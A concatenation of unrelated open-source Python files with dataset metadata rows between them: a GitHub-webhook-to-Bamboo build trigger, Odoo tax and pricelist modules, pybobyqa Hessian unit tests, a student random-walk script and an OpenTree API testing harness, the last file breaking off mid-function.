print "Config file {} has invalid json.".format(config_file)
except OSError:
print "Config file {} does not exist".format(config_file)
return {}
def is_commit(msg):
'''
Check to make sure the github hook is firing on a commit.
'''
accepted = ['synchronize', 'opened', 'reopened']
commit = msg.get('action') in accepted
if not commit:
print "Not a commit hook. Action: {}, Accepted {}".format(msg.get('action'),
accepted)
return commit
def get_sha1_hmac(shared_secret, raw):
'''
Takes the shared secret and a raw string and generates
and returns a sha1 hmac
'''
hashed = hmac.new(str(shared_secret), str(raw), hashlib.sha1).hexdigest()
return "sha1={}".format(hashed)
class GithubHandler(tornado.web.RequestHandler):
'''
Handle posts from github hook
'''
def verify_secret(self, request, config):
'''
Verify the shared secret, returns True on verified False otherwise
'''
ss = config.get("github_shared_secret")
if not ss:
print "No shared secret configured (github_shared_secret)"
return
gh_digest = request.headers.get("X-Hub-Signature")
if not gh_digest:
print "Did not recieve digest from github. Do you have it configured in the hook?"
return
local_digest = get_sha1_hmac(ss, request.body)
if local_digest != gh_digest:
print "Digest from github did not match our digest"
print "GH : {}".format(gh_digest)
print "LOCAL: {}".format(local_digest)
return
else:
return True
def post(self):
config_file = os.environ.get('BAMBOO_PR_FEEDBACK_CONFIG', "../config/config.json")
config = get_config(config_file)
if not self.verify_secret(self.request, config):
return
data = self.request.body
try:
data = json.loads(data)
except ValueError:
print "Recieved invalid json"
print data
return
if not is_commit(data):
return
plan = config.get("plan")
host = config.get("bamboo_host")
port = config.get("bamboo_port", 443)
user = config.get("bamboo_user")
password = config.get("bamboo_password", bamboo_password)
# Required fields, unsafe get
bamboo_data = {}
bamboo_data["pull_num"] = data["number"]
bamboo_data["pull_sha"] = data["pull_request"]["head"]["sha"]
bamboo_data["pull_ref"] = data["pull_request"]["head"]["ref"]
run_bamboo_job(plan, host, port, user, password, bamboo_data)
self.finish()
def run_bamboo_job(plan, host, port, user,
password, bamboo_data):
'''
Post to bamboo server to kick off a job.
'''
params = ""
for k, v in bamboo_data.iteritems():
params += "&bamboo.variable.{}={}".format(k, v)
bamboo_queue_build = "https://{}:{}/builds/rest/api/latest/queue/{}?os_athType=basic{}"
url = bamboo_queue_build.format(host, port, plan, params)
headers = {}
headers['Accept'] = 'application/json'
res = requests.post(url, auth=(user, password), headers=headers)
if res.status_code != 200:
print "Error starting job"
print res.json()
else:
print "Running commit: {}".format(bamboo_data['pull_sha'])
def parse_args():
p = argparse.ArgumentParser(description=\
'''
Processes github hooks and activates bamboo builds via rest api
''')
p.add_argument('--ssl-cert', help='location of ssl cert', required=True)
p.add_argument('--ssl-key', help='location of ssl cert', required=True)
return p.parse_args()
def main():
args = parse_args()
ssl_settings = {
"certfile": args.ssl_cert,
"keyfile": args.ssl_key
}
config_file = os.environ.get('BAMBOO_PR_FEEDBACK_CONFIG', "../config/config.json")
config = get_config(config_file)
application = tornado.web.Application([
(r"/gh", GithubHandler)
])
server = tornado.httpserver.HTTPServer(application, ssl_options=ssl_settings)
server.listen(config.get("server_port", 80))
if not config.get('bamboo_password'):
global bamboo_password
bamboo_password = getpass.getpass('Please enter your bamboo password: \n').strip()
print "Listening on port: {}".format(config.get("server_port", 80))
tornado.ioloop.IOLoop.instance().start()
if __name__ == '__main__':
main()
| mit | -2,551,280,784,974,783,000 | 29.321839 | 94 | 0.608036 | false |
open-synergy/opnsynid-l10n-indonesia | l10n_id_taxform_retur_pajak_masukan/models/retur_pajak_masukan.py | 1 | 2380 | # -*- coding: utf-8 -*-
# Copyright 2017 OpenSynergy Indonesia
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from openerp import models, fields, api
class ReturPajakMasukan(models.Model):
_name = "l10n_id.retur_pajak_masukan"
_description = "Retur Pajak Masukan"
_inherit = ["l10n_id.faktur_pajak_common"]
@api.model
def _get_faktur_pajak_type(self):
return self.env.ref(
"l10n_id_taxform_retur_pajak_masukan.fp_type_rp_masukan")
name = fields.Char(
string="# Retur Pajak Masukan",
)
enofa_nomor_dokumen = fields.Char(
string="NOMOR_DOKUMEN_RETUR",
)
enofa_tanggal_dokumen = fields.Char(
string="TANGGAL_RETUR",
)
enofa_masa_pajak = fields.Char(
string="MASA_PAJAK_RETUR",
)
enofa_tahun_pajak = fields.Char(
string="TAHUN_PAJAK_RETUR",
)
enofa_jumlah_dpp = fields.Char(
string="NILAI_RETUR_DPP",
)
enofa_jumlah_ppn = fields.Char(
string="NILAI_RETUR_PPN",
)
enofa_jumlah_ppnbm = fields.Char(
string="NILAI_RETUR_PPNBM",
)
enofa_nomor_dokumen_balik = fields.Char(
string="NOMOR_FAKTUR",
)
enofa_tanggal_dokumen_balik = fields.Char(
string="TANGGAL_FAKTUR",
)
reference_id = fields.Many2one(
string="Doc. Reference",
comodel_name="account.move",
)
reference_ids = fields.Many2many(
string="Doc. References",
comodel_name="account.move",
relation="rel_rp_masukan_2_move",
column1="rp_masukan_id",
column2="move_id",
)
all_reference_ids = fields.Many2many(
string="Doc. References",
comodel_name="account.move",
relation="rel_rp_masukan_2_all_move",
compute="_compute_all_reference",
column1="rp_masukan_id",
column2="move_id",
store=True,
)
reverse_id = fields.Many2one(
string="Reverse From",
comodel_name="l10n_id.faktur_pajak_masukan",
)
substitute_id = fields.Many2one(
string="Substitute For",
comodel_name="l10n_id.retur_pajak_masukan",
)
@api.onchange("reference_id")
def onchange_reference_id(self):
if self.reference_id:
self.name = self.reference_id.name
| agpl-3.0 | 1,572,841,041,619,940,400 | 27.382716 | 69 | 0.584454 | false |
numericalalgorithmsgroup/pybobyqa | pybobyqa/tests/test_hessian.py | 1 | 7948 | """
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
The development of this software was sponsored by NAG Ltd. (http://www.nag.co.uk)
and the EPSRC Centre For Doctoral Training in Industrially Focused Mathematical
Modelling (EP/L015803/1) at the University of Oxford. Please contact NAG for
alternative licensing.
"""
# Ensure compatibility with Python 2
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
import unittest
from pybobyqa.hessian import Hessian
def array_compare(x, y, thresh=1e-14):
return np.max(np.abs(x - y)) < thresh
class TestBasicInit(unittest.TestCase):
def runTest(self):
n = 4
nvals = n*(n+1)//2
hess = Hessian(n)
self.assertEqual(hess.shape(), (nvals,), 'Wrong shape for initialisation')
self.assertEqual(hess.dim(), n, 'Wrong dimension')
self.assertEqual(len(hess), nvals, 'Wrong length')
self.assertTrue(np.all(hess.upper_triangular() == np.zeros((nvals,))), 'Wrong initialised values')
class TestInitFromVector(unittest.TestCase):
def runTest(self):
n = 5
nvals = n*(n+1)//2
x = np.arange(nvals, dtype=float)
hess = Hessian(n, vals=x)
self.assertEqual(hess.shape(), (nvals,), 'Wrong shape for initialisation')
self.assertEqual(hess.dim(), n, 'Wrong dimension')
self.assertEqual(len(hess), nvals, 'Wrong length')
self.assertTrue(np.all(hess.upper_triangular() == x), 'Wrong initialised values')
class TestInitFromMatrix(unittest.TestCase):
def runTest(self):
n = 3
nvals = n*(n+1)//2
A = np.arange(n**2, dtype=float).reshape((n,n))
hess = Hessian(n, vals=A+A.T) # force symmetric
self.assertEqual(hess.shape(), (nvals,), 'Wrong shape for initialisation')
self.assertEqual(hess.dim(), n, 'Wrong dimension')
self.assertEqual(len(hess), nvals, 'Wrong length')
self.assertTrue(np.all(hess.upper_triangular() == np.array([0.0, 4.0, 8.0, 8.0, 12.0, 16.0])),
'Wrong initialised values')
class TestToFull(unittest.TestCase):
def runTest(self):
n = 7
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = A + A.T # force symmetric
hess = Hessian(n, vals=H)
self.assertTrue(np.all(hess.as_full() == H), 'Wrong values')
class TestGetElementGood(unittest.TestCase):
def runTest(self):
n = 3
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = A + A.T # force symmetric
hess = Hessian(n, vals=H)
for i in range(n):
for j in range(n):
self.assertEqual(hess.get_element(i, j), H[i,j], 'Wrong value for (i,j)=(%g,%g): got %g, expecting %g'
% (i, j, hess.get_element(i, j), H[i,j]))
class TestGetElementBad(unittest.TestCase):
def runTest(self):
n = 4
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = A + A.T # force symmetric
hess = Hessian(n, vals=H)
# When testing for assertion errors, need lambda to stop assertion from actually happening
self.assertRaises(AssertionError, lambda: hess.get_element(-1, 0))
self.assertRaises(AssertionError, lambda: hess.get_element(-1, 0))
self.assertRaises(AssertionError, lambda: hess.get_element(-3, n-1))
self.assertRaises(AssertionError, lambda: hess.get_element(n, 0))
self.assertRaises(AssertionError, lambda: hess.get_element(n+3, 0))
self.assertRaises(AssertionError, lambda: hess.get_element(n+7, n-1))
self.assertRaises(AssertionError, lambda: hess.get_element(0, -1))
self.assertRaises(AssertionError, lambda: hess.get_element(0, -1))
self.assertRaises(AssertionError, lambda: hess.get_element(n-1, -3))
self.assertRaises(AssertionError, lambda: hess.get_element(0, n))
self.assertRaises(AssertionError, lambda: hess.get_element(0, n+3))
self.assertRaises(AssertionError, lambda: hess.get_element(n-1, n+7))
class TestSetElementGood(unittest.TestCase):
def runTest(self):
n = 3
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = A + A.T # force symmetric
hess = Hessian(n, vals=H)
H2 = np.sin(H)
for i in range(n):
for j in range(n):
hess.set_element(i, j, H2[i,j])
for i in range(n):
for j in range(n):
self.assertEqual(hess.get_element(i, j), H2[i, j], 'Wrong value for (i,j)=(%g,%g): got %g, expecting %g'
% (i, j, hess.get_element(i, j), H2[i, j]))
class TestSetElementBad(unittest.TestCase):
def runTest(self):
n = 5
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = A + A.T # force symmetric
hess = Hessian(n, vals=H)
# When testing for assertion errors, need lambda to stop assertion from actually happening
self.assertRaises(AssertionError, lambda: hess.set_element(-1, 0, 1.0))
self.assertRaises(AssertionError, lambda: hess.set_element(-1, 0, 2.0))
self.assertRaises(AssertionError, lambda: hess.set_element(-3, n - 1, 3.0))
self.assertRaises(AssertionError, lambda: hess.set_element(n, 0, 4.0))
self.assertRaises(AssertionError, lambda: hess.set_element(n + 3, 0, -4.0))
self.assertRaises(AssertionError, lambda: hess.set_element(n + 7, n - 1, 5.0))
self.assertRaises(AssertionError, lambda: hess.set_element(0, -1, 6.0))
self.assertRaises(AssertionError, lambda: hess.set_element(0, -1, 7.0))
self.assertRaises(AssertionError, lambda: hess.set_element(n - 1, -3, -7.0))
self.assertRaises(AssertionError, lambda: hess.set_element(0, n, -76.3))
self.assertRaises(AssertionError, lambda: hess.set_element(0, n + 3, 2.8))
self.assertRaises(AssertionError, lambda: hess.set_element(n - 1, n + 7, -1.0))
class TestMultGood(unittest.TestCase):
def runTest(self):
n = 5
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = np.sin(A + A.T) # force symmetric
hess = Hessian(n, vals=H)
vec = np.exp(np.arange(n, dtype=float))
hs = np.dot(H, vec)
self.assertTrue(array_compare(hess*vec, hs, thresh=1e-12), 'Wrong values')
class TestMultBad(unittest.TestCase):
def runTest(self):
n = 5
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = A + A.T # force symmetric
hess = Hessian(n, vals=H)
# When testing for assertion errors, need lambda to stop assertion from actually happening
self.assertRaises(AssertionError, lambda: hess * 1.0)
self.assertRaises(AssertionError, lambda: hess * None)
self.assertRaises(AssertionError, lambda: hess * [float(i) for i in range(n)])
self.assertRaises(AssertionError, lambda: hess * np.arange(n-1, dtype=float))
self.assertRaises(AssertionError, lambda: hess * np.arange(n+1, dtype=float))
class TestNeg(unittest.TestCase):
def runTest(self):
n = 5
A = np.arange(n ** 2, dtype=float).reshape((n, n))
H = A + A.T # force symmetric
hess = Hessian(n, vals=H)
neghess = -hess
self.assertTrue(np.allclose(hess.upper_triangular(), -neghess.upper_triangular()), 'Wrong negative values')
| gpl-3.0 | -7,834,234,041,995,986,000 | 42.431694 | 120 | 0.632738 | false |
artopping/nyu-python | course1/assignment_6/rf_random_walk.py | 1 | 2312 | #!/usr/bin/env python3
import random
import sys
import math
def get_random_direction():
direction = ""
probability = random.random()
if probability < 0.25:
direction = "west"
elif 0.25<=probability<0.5:
direction= "north"
elif 0.5<= probability<0.75:
direction= "south"
else:
direction = "east"
return direction
def get_direction_displacement():
displacements = {
'west': (-1, 0),
'east': (1, 0),
'north': (0, 1),
'south': (0, -1)
}
displacement = displacements.get(get_random_direction())
return displacement
def take_walk(steps):
current_location = [0, 0]
for step_index in range(steps):
direction = get_random_direction()
displacement = get_direction_displacement()
# extract the numerical values from the tuple
delta_x = displacement[0]
delta_y = displacement[1]
current_location[0] += delta_x
current_location[1] += delta_y
return current_location
# UPDATE current_location HERE
# consult example in 'Storing and Updating State' for method to update
# current_location
def take_all_walks(steps, runs):
endpoints = []
for run_index in range(runs):
end_location = take_walk(steps)
endpoints.append(end_location)
return endpoints
return end_location
print (endpoints)
print (end_location)
def average_final_distance(endpoints):
total_distance = 0
for coords in endpoints:
dx = coords[0]
dy = coords[1]
#use the Pythagorean theorem to get distance like last session
distance = math.sqrt(dx**2 + dy**2)
total_distance += distance
return total_distance / len(endpoints)
if __name__ == "__main__":
steps = 10
if len(sys.argv) > 1:
steps = int(sys.argv[1])
runs = 1
if len(sys.argv) > 2:
runs = int(sys.argv[2])
end_locations = take_all_walks(steps, runs)
current_location = take_walk(steps)
#if len(sys.argv) > 1:
#steps = int(sys.argv[1])
print("Done with walk, printing end location: ")
#print(current_location)
print (end_locations)
average_displacement = average_final_distance(end_locations)
print(average_displacement)
| mit | -265,223,460,572,834,500 | 26.855422 | 78 | 0.609429 | false |
OpenTreeOfLife/germinator | ws-tests/opentreetesting.py | 1 | 10580 | #!/usr/bin/env python
# This file was copied from the phylesystem-api repo and is intended
# to replace it.
from ConfigParser import SafeConfigParser
from cStringIO import StringIO
import requests
import gzip
import json
import sys
import os
_CONFIG = None
_CONFIG_FN = None
if 'VERBOSE_TESTING' in os.environ:
try:
_VERBOSITY_LEVEL = int(os.environ['VERBOSE_TESTING'])
except:
_VERBOSITY_LEVEL = 1
else:
_VERBOSITY_LEVEL = 0
def debug(s):
if _VERBOSITY_LEVEL > 0:
sys.stderr.write('testing-harness: {s}\n'.format(s=s))
def config(section=None, param=None, default=None):
'''
Returns the config object if `section` and `param` are None, or the
value for the requested parameter.
If the parameter (or the section) is missing, the exception is logged and
None is returned.
'''
global _CONFIG, _CONFIG_FN
if _CONFIG is None:
_CONFIG_FN = os.path.abspath('test.conf')
_CONFIG = SafeConfigParser()
_CONFIG.read(_CONFIG_FN)
parse_argv_as_options(_CONFIG)
if section is None and param is None:
return _CONFIG
try:
v = _CONFIG.get(section, param)
return v
except:
if default != None:
return default
else:
sys.stderr.write('Config file "%s" does not contain option "%s" in section "%s"\n' % (_CONFIG_FN, param, section))
return None
# Obtain command line option assignments given in the form section:parameter=option
def parse_argv_as_options(_CONFIG):
for arg in sys.argv[1:]:
equatands = arg.split('=')
if len(equatands) == 2:
sec_param = equatands[0].split(':')
if len(sec_param) == 2:
if not _CONFIG.has_section(sec_param[0]):
_CONFIG.add_section(sec_param[0])
_CONFIG.set(sec_param[0], sec_param[1], equatands[1])
else:
sys.stderr.write('Command line argument %s not in form section:parameter=value' % (arg))
else:
sys.stderr.write('Command line argument %s not in form section:parameter=value' % (arg))
def summarize_json_response(resp):
sys.stderr.write('Sent request to %s\n' %(resp.url))
raise_for_status(resp)
try:
results = resp.json()
except:
print 'Non json resp is:', resp.text
return False
if isinstance(results, unicode) or isinstance(results, str):
print results
er = json.loads(results)
print er
print json.dumps(er, sort_keys=True, indent=4)
sys.stderr.write('Getting JavaScript string. Object expected.\n')
return False
print json.dumps(results, sort_keys=True, indent=4)
return True
def summarize_gzipped_json_response(resp):
sys.stderr.write('Sent request to %s\n' %(resp.url))
raise_for_status(resp)
try:
uncompressed = gzip.GzipFile(mode='rb', fileobj=StringIO(resp.content)).read()
results = uncompressed
except:
raise
if isinstance(results, unicode) or isinstance(results, str):
er = json.loads(results)
print json.dumps(er, sort_keys=True, indent=4)
return True
else:
print 'Non gzipped response, but not a string is:', results
return False
def get_obj_from_http(url,
verb='GET',
data=None,
params=None,
headers=None):
'''Call `url` with the http method of `verb`.
If specified `data` is passed using json.dumps
returns the json content of the web service or raise an HTTP error
'''
if headers is None:
headers = {
'content-type' : 'application/json',
'accept' : 'application/json',
}
if data:
resp = requests.request(verb,
translate(url),
headers=headers,
data=json.dumps(data),
params=params,
allow_redirects=True)
else:
resp = requests.request(verb,
translate(url),
headers=headers,
params=params,
allow_redirects=True)
debug('Sent {v} to {s}'.format(v=verb, s=resp.url))
debug('Got status code {c}'.format(c=resp.status_code))
if resp.status_code != 200:
debug('Full response: {r}'.format(r=resp.text))
raise_for_status(resp)
return resp.json()
# Returns two results if return_bool_data.
# Otherwise returns one result.
def test_http_json_method(url,
verb='GET',
data=None,
headers=None,
expected_status=200,
expected_response=None,
return_bool_data=False,
is_json=True):
'''Call `url` with the http method of `verb`.
If specified `data` is passed using json.dumps
returns True if the response:
has the expected status code, AND
has the expected content (if expected_response is not None)
'''
fail_return = (False, None) if return_bool_data else False
if headers is None:
headers = {
'content-type' : 'application/json',
'accept' : 'application/json',
}
if data:
resp = requests.request(verb,
translate(url),
headers=headers,
data=json.dumps(data),
allow_redirects=True)
else:
resp = requests.request(verb,
translate(url),
headers=headers,
allow_redirects=True)
if resp.status_code != expected_status:
debug('Sent {v} to {s}'.format(v=verb, s=resp.url))
debug('Got status code {c} (expecting {e})'.format(c=resp.status_code,e=expected_status))
debug('Did not get expected response status. Got:\n{s}'.format(s=resp.status_code))
debug('Full response: {r}'.format(r=resp.text))
raise_for_status(resp)
# this is required for the case when we expect a 4xx/5xx but a successful return code is returned
return fail_return
if expected_response is not None:
if not is_json:
return (True, resp.text) if return_bool_data else True
try:
results = resp.json()
if results != expected_response:
debug('Did not get expect response content. Got:\n{s}'.format(s=resp.text))
return fail_return
except:
debug('Non json resp is:' + resp.text)
return fail_return
if _VERBOSITY_LEVEL > 1:
debug(unicode(results))
elif _VERBOSITY_LEVEL > 1:
debug('Full response: {r}'.format(r=resp.text))
if not is_json:
return (True, resp.text) if return_bool_data else True
return (True, resp.json()) if return_bool_data else True
def raise_for_status(resp):
try:
resp.raise_for_status()
except Exception, e:
try:
j = resp.json()
m = '\n '.join(['"{k}": {v}'.format(k=k, v=v) for k, v in r.items()])
sys.stderr.write('resp.json = {t}'.format(t=m))
except:
if resp.text:
sys.stderr.write('resp.text = {t}\n'.format(t=resp.text))
raise e
def api_is_readonly():
s = config('host', 'allowwrite', 'false').lower()
return not (s == 'true')
def exit_if_api_is_readonly(fn):
if not api_is_readonly():
return
if _VERBOSITY_LEVEL > 0:
debug('Running in read-only mode. Skipped {}'.format(fn))
# This coordinates with run_tests.sh
sys.exit(3)
def github_oauth_for_write_or_exit(fn):
"""Pass in the name of test file and get back the OAUTH token from
the GITHUB_OAUTH_TOKEN environment if the test is not readonly.
Otherwise, exit with the exit code (3) that signals tests skipping.
"""
exit_if_api_is_readonly(fn)
auth_token = os.environ.get('GITHUB_OAUTH_TOKEN')
if auth_token is None:
debug('{} skipped due to lack of GITHUB_OAUTH_TOKEN in env\n'.format(fn))
# This coordinates with run_tests.sh
sys.exit(3)
return auth_token
def writable_api_host_and_oauth_or_exit(fn):
"""Convenience/safety function to makes sure you aren't running
writable phylesystem tests against the production api server.
Returns the domain and GITHUB_OAUTH_TOKEN token if the test configuration
is not readonly, the server is not "https://api.opentree.*" and GITHUB_OAUTH_TOKEN
is in your env. Otherwise exits with the "skip" test code.
"""
apihost = config('host', 'apihost').strip()
if apihost.startswith('https://api.opentree'):
debug('{} skipped because host is set to production api server. This test must be run locally or against devapi.\n'.format(fn))
# This coordinates with run_tests.sh
sys.exit(3)
auth_token = github_oauth_for_write_or_exit(fn)
return apihost, auth_token
# Mimic the behavior of apache so that services can be tested without
# having apache running. See deploy/setup/opentree-shared.conf
translations = [('/v2/study/', '/phylesystem/v1/study/'),
('/cached/', '/phylesystem/default/cached/'),
# treemachine
('/v2/graph/', '/db/data/ext/graph/graphdb/'),
('/v2/tree_of_life/', '/db/data/ext/tree_of_life/graphdb/'),
('/v3/tree_of_life/', '/db/data/ext/tree_of_life_v3/graphdb/'),
# taxomachine
('/taxomachine/v1/', '/db/data/ext/TNRS/graphdb/'),
('/v2/tnrs/', '/db/data/ext/tnrs_v2/graphdb/'),
('/v2/taxonomy/', '/db/data/ext/taxonomy/graphdb/'),
('/v3/tnrs/', '/db/data/ext/tnrs_v3/graphdb/'),
('/v3/taxonomy/', '/db/data/ext/taxonomy_v3/graphdb/'),
# oti
('/v3/studies/', '/db/data/ext/studies/graphdb/'),
('/v2/studies/', '/db/data/ext/studies/graphdb/'),
# smasher (port 8081)
('/v2/conflict/', '/')
]
def translate(s):
if config('host', 'translate', 'false') == 'true':
for (src, dst) in translations:
if src in s:
return s.replace(src, dst)
return s
| bsd-2-clause | 149,666,204,171,669,300 | 36.51773 | 135 | 0.566163 | false |
Micronaet/micronaet-migration | report_product_pricelist/wizard/create_pricelist.py | 1 | 18271 | # -*- coding: utf-8 -*-
###############################################################################
#
# ODOO (ex OpenERP)
# Open Source Management Solution
# Copyright (C) 2001-2015 Micronaet S.r.l. (<http://www.micronaet.it>)
# Developer: Nicola Riolini @thebrush (<https://it.linkedin.com/in/thebrush>)
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import os
import sys
import logging
import openerp
import openerp.netsvc as netsvc
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv, expression, orm
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from openerp import SUPERUSER_ID, api
from openerp import tools
from openerp.tools.translate import _
from openerp.tools.float_utils import float_round as round
from openerp.tools import (DEFAULT_SERVER_DATE_FORMAT,
DEFAULT_SERVER_DATETIME_FORMAT,
DATETIME_FORMATS_MAP,
float_compare)
_logger = logging.getLogger(__name__)
class MicronaetInvoiceLine(orm.Model):
''' Invoice line
'''
_name = 'micronaet.invoice.line'
_description = 'Invoice line'
_order = 'date'
_columns = {
'name': fields.char('Invoice number', size=10, required=True),
'partner': fields.char('Invoice number', size=9),
'price': fields.char('Invoice number', size=15),
'quantity': fields.char('Invoice number', size=10),
'product': fields.char('Invoice number', size=10),
'date': fields.char('Invoice number', size=10),
}
# Product pricelist from model to generated:
class product_pricelist_generator(orm.TransientModel):
""" Product pricelist generator
Copy an inactive pricelist creating a new pricelist with all product
and calculate the price with actual pricelist rules
"""
_name = "product.pricelist.generator"
_description = "Product pricelist generator"
_columns = {
'pricelist_org_id': fields.many2one(
'product.pricelist', 'Original pricelist', required=True,
help="Choose original pricelist used to calculate new complete "
"pricelist/version"),
'new': fields.boolean('New',
help="Generate a new pricelist with this name"),
'new_name': fields.char('New version name', size=64),
'pricelist_des_id': fields.many2one(
'product.pricelist', 'Destination pricelist',
help="If no new pricelist, use this pricelist to upgrade fields"),
}
_defaults = {
'new': lambda *x: True,
}
def do_create_update(self, cr, uid, ids, context=None):
""" Create or update pricelist
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of ids
@return: Dictionary {}
"""
if context is None:
context={}
wiz_browse = self.browse(cr, uid, ids[0], context=context)
pricelist_ref_id = wiz_browse.pricelist_org_id.id
if wiz_browse.new: # per ora facciamo questo
if not wiz_browse.new_name: # TODO and duplicated!
# TODO comunicate error!
return {'type': 'ir.actions.act_window_close'}
# Create new pricelist and pricelist version
pricelist_id = self.pool.get('product.pricelist').create(cr, uid, {
'name': wiz_browse.new_name,
'type': 'sale',
'tipology': 'historical',
})
if pricelist_id:
version_id = self.pool.get('product.pricelist.version').create(
cr, uid, {
'name': "Versione: " + wiz_browse.new_name + \
" definitiva",
#'date_end': False,
#'date_start': False,
#'company_id': False,
#'active': True,
'pricelist_id': pricelist_id,
})
else:
pass
else:
# Get pricelist and pricelist version
pricelist_id = 0
version_id = 0
# creati o trovati i listino/versione e deve esistere l'origine
if pricelist_id and version_id and wiz_browse.pricelist_org_id:
product_ids = self.pool.get('product.product').search(
cr, uid, [('mexal_id', 'ilike', 'C')], context=context)
# TODO write right filter
for product in self.pool.get('product.product').read(
cr, uid, product_ids, ['id', 'name', 'code']):
if product['code'][0:1].upper() == "C":
price_calc = self.pool.get('product.pricelist').price_get(
cr, uid, [pricelist_ref_id], product['id'], 1.0, False, {
'uom': False,
'date': False,
})[pricelist_ref_id]
self.pool.get('product.pricelist.item').create(
cr, uid, {
'price_round': 0.00001,
'price_discount': 0.0, #0.052600000000000001,
#'base_pricelist_id': False,
'sequence': 200,
'price_max_margin': 0.0,
#'company_id': False,
#'product_tmpl_id': False,
'product_id': product['id'],
'base': 1,
#[3, 'Rif. anno 2011'],
'price_version_id': version_id,
'min_quantity': 1,
# TODO Calcolare in funzione del listino
'price_surcharge': price_calc,
#'price_min_margin': 0.0,
#'categ_id': False,
'name': "[%s] %s"%(product['code'], product['name']),
})
else:
pass # TODO comunicate error!
return {'type': 'ir.actions.act_window_close'}
# Product pricelist for customer:
class product_pricelist_customer(orm.TransientModel):
""" Product pricelist generator for customers
"""
_name = "product.pricelist.customer"
_description = "Product pricelist customer"
_columns = {
'partner_id': fields.many2one('res.partner', 'Partner', required=True,
help="Choose partner to create custom pricelist or "
"add quotations"),
'comment': fields.char('Comment', size=64,
help="Need to be created or updated"),
'product_id': fields.many2one('product.product', 'Product',
required=True),
'pricelist_id': fields.many2one(
'product.pricelist', 'Current pricelist', required=True,
help="Choose original pricelist used to calculate new complete "
"pricelist/version"),
'pricelist_model_history_id': fields.many2one(
'product.pricelist', 'Listino di riferimento',
help="Listino di riferimento applicato nel caso mancassero degli "
"articoli nel listino di base (usato per avere un raffronto "
"nel caso esistessero particolarità"),
'pricelist_model_id': fields.many2one(
'product.pricelist', 'Listino di paragone',
help="Listino di paragone per avere un raffronto con il prezzo "
"attuale del prodotto"),
'price': fields.float('Price listino cliente', digits=(16, 5)),
'price_model_history': fields.float(
'Prezzo list di rif.', digits=(16, 5)),
'price_model': fields.float('Prezzo di paragone', digits=(16, 5)),
'price_history': fields.text('Prezzo storico'),
'price_invoice_history': fields.text('Prezzo storico fatturato'),
}
# on change function
def onchange_pricelist(self, cr, uid, ids, pricelist_id, product_id,
context=None):
''' Read price from pricelist for product
'''
if context is None:
context={}
res = {'value': {}}
if pricelist_id: # cerco il listino
res['value']['price']=self.pool.get('product.pricelist').price_get(
cr, uid, [pricelist_id], product_id , 1.0, False, {
'uom': False, 'date': False})[pricelist_id]
return res # fino a qui per ora
#Azzero il prezzo
return {'value': {'price': False}}
def onchange_partner_pricelist(self, cr, uid, ids, partner_id,
pricelist_id, product_id, context = None):
'''Create a new pricelist if not custom
add custom price
add old version as reference
'''
if context is None:
context = {}
res={'value': {}}
if partner_id: # cerco il listino
partner = self.pool.get("res.partner").browse(cr, uid, partner_id)
partner_pricelist_id = partner.property_product_pricelist.id or 0
# pricelist_id only if not passed (to keep the change)
if not pricelist_id:
pricelist_id=partner_pricelist_id
res['value']['pricelist_id']=pricelist_id
res['value'][
'pricelist_model_history_id'] = \
partner.pricelist_model_history_id.id or 0
res['value']['pricelist_model_id'] = \
partner.pricelist_model_id.id or 0
return res # fino a qui per ora
return {'value': {}}
def onchange_partner_pricelist_product(self, cr, uid, ids, partner_id,
pricelist_id, product_id, pricelist_model_history_id,
pricelist_model_id, context = None):
'''Create a new pricelist if not custom
add custom price
add old version as reference
'''
if context is None:
context = {}
res = {'value': {}}
if product_id and pricelist_id: # cerco il listino
res['value']['price'] = self.pool.get(
'product.pricelist').price_get(
cr, uid, [pricelist_id], product_id , 1.0, False, {
'uom': False,
'date': False,
})[pricelist_id] if pricelist_id else ""
res['value']['price_model_history'] = self.pool.get(
'product.pricelist').price_get(
cr, uid, [pricelist_model_history_id], product_id , 1.0,
False, {
'uom': False,
'date': False,
})[pricelist_model_history_id] if \
pricelist_model_history_id else ""
res['value']['price_model'] = self.pool.get(
'product.pricelist').price_get(
cr, uid, [pricelist_model_id], product_id , 1.0, False, {
'uom': False,
'date': False,
})[pricelist_model_id] if pricelist_model_id else ""
# Order history:
order_line_ids = self.pool.get('sale.order.line').search(
cr, uid, [
('product_id','=',product_id),
('order_partner_id','=',partner_id),
])
if order_line_ids:
list_quotation = "%20s%20s%20s%40s\n" % (
"Data", "Ordine", "Prezzo", "Commento")
for line in self.pool.get('sale.order.line').browse(
cr, uid, order_line_ids):
list_quotation += "%20s%20s%20s%40s\n" % (
datetime.strptime(
line.order_id.date_order, '%Y-%m-%d').strftime(
'%d/%m/%Y'),
line.order_id.name,
line.price_unit,
line.price_comment or "")
res['value']['price_history'] = list_quotation
else:
res['value']['price_history'] = ""
# Invoice history:
product_proxy = self.pool.get('product.product').browse(
cr, uid, product_id)
product_code = product_proxy.code #"C3114409"
partner_proxy = self.pool.get('res.partner').browse(
cr, uid, partner_id)
partner_code = partner_proxy.mexal_c #"230.00179" # TODO parametrize
invoice_line_ids = self.pool.get('micronaet.invoice.line').search(
cr, uid, [
('product','=',product_code),
